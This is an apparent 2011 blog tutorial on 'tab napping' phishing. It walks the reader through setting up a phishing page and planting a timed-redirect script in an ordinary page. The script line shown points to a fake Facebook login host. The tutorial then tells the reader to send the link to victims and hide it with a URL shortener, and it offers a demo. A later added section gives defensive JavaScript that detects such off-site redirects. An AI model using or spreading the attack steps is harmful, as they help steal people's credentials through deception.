Saturday, May 28, 2011





INTRODUCTION:

Tab napping is a new type of phishing scam that does not require you to click on any URL to be redirected to the phishing site. Instead, it relies on the fact that a lot of people use tabbed browsing (opening multiple tabs while browsing). In tab napping, the page in one of your inactive tabs is automatically replaced with a new page without your knowledge. It is a smarter kind of phishing that works by confusing the victim. For example, the victim was viewing page A in one browser tab, left it idle, and is now using some other website in another tab. After some time, page A will automatically change to your phishing page. The idea is to confuse the victim across the multiple tabs of the browser.


Now let's move on to the tutorial:
1. First we need a simple phishing setup that we have discussed before. You can get your phisher from here.

2. You will need your hosting, blog, or any web page in which you can put the JavaScript, so that you can send its link to the victim.

3. Get your JavaScript from here.

4. Now replace the link in the JavaScript with your phishing page link. The line to change, which appears in two places in the script, is:

  timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

5. After replacing it, select all and copy the tab napping script, then paste this code at the end of the real page's HTML code (that is, above </html>).

6. This script will not make any visible change to your web page or blog page.

  • This script will track the user's actions, and as soon as the blog is left idle,
  • the script will redirect the victim to the phishing page you specified.
  • Now send this blog address to your victim, or you can upload your malicious web page to a web host and then send the link to the victim.

7. To improve it further, you can shorten your URL so that the victim won't be able to know your intentions. Get any URL shortener from here.
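
Seen from the defender's side, the timed redirect from step 4 is easy to find in page source. The following is an added example, not part of the original post or its script: it scans a page's inline scripts for timers that navigate the tab and reports whether the destination is off-site. The function name, the sample markup and the example hosts are all constructed for illustration.

```javascript
// Added example: static check for tabnapping-style timed redirects.
// findTimedRedirects and SAMPLE_PAGE are hypothetical names; the markup is constructed.

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// setInterval/setTimeout whose first argument is a string or a function, plus its delay.
const TIMER_RE = /set(?:Interval|Timeout)\s*\(\s*(["'`]|function\b|\(\s*\)\s*=>)([\s\S]*?),\s*(\d+)\s*\)/g;
// Navigation sinks: location = ..., location.href = ..., location.replace(...), location.assign(...).
const NAV_RE = /location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\s*\(/;
// First quoted literal assigned or passed to the sink.
const TARGET_RE = /(?:=|\()\s*["']([^"']+)["']/;

function findTimedRedirects(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const [, script] of html.matchAll(SCRIPT_RE)) {
    for (const m of script.matchAll(TIMER_RE)) {
      const body = m[2];
      if (!NAV_RE.test(body)) continue;        // timer does not navigate: ignore
      const lit = body.match(TARGET_RE);
      const target = lit ? lit[1] : null;      // null when the URL is built at runtime
      let offSite = null;
      if (target) {
        try { offSite = new URL(target, pageUrl).origin !== pageOrigin; }
        catch (e) { offSite = null; }          // unparsable target: leave undecided
      }
      findings.push({ delayMs: Number(m[3]), target, offSite });
    }
  }
  return findings;
}

// Constructed sample: one off-site timed redirect in the form shown in step 4,
// one same-site session-expiry redirect, and one timer that never navigates.
const SAMPLE_PAGE = `
<html><body><p>blog post</p>
<script>
timerRedirect = setInterval("location.href='http://phish.example/index.html'", 10000);
setTimeout(function () { location.href = "/session-expired"; }, 900000);
setInterval(function () { tick(); }, 1000);
</script>
</body></html>`;

for (const f of findTimedRedirects(SAMPLE_PAGE, "https://blog.example/post")) {
  console.log(`${f.offSite ? "ALERT" : "info "} redirect after ${f.delayMs} ms -> ${f.target}`);
}
```

Only the off-site entry is reported as an alert; the same-site redirect is listed for review and the plain timer is skipped.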

HERE IS A DEMO OF TABNAPPING PAGE:

Just go HERE and keep yourself idle for 10 sec. You will be redirected to my phishing page.

Note: This is illegal and is for educational purposes only. Any loss/damage happening will not be in any way our responsibility.
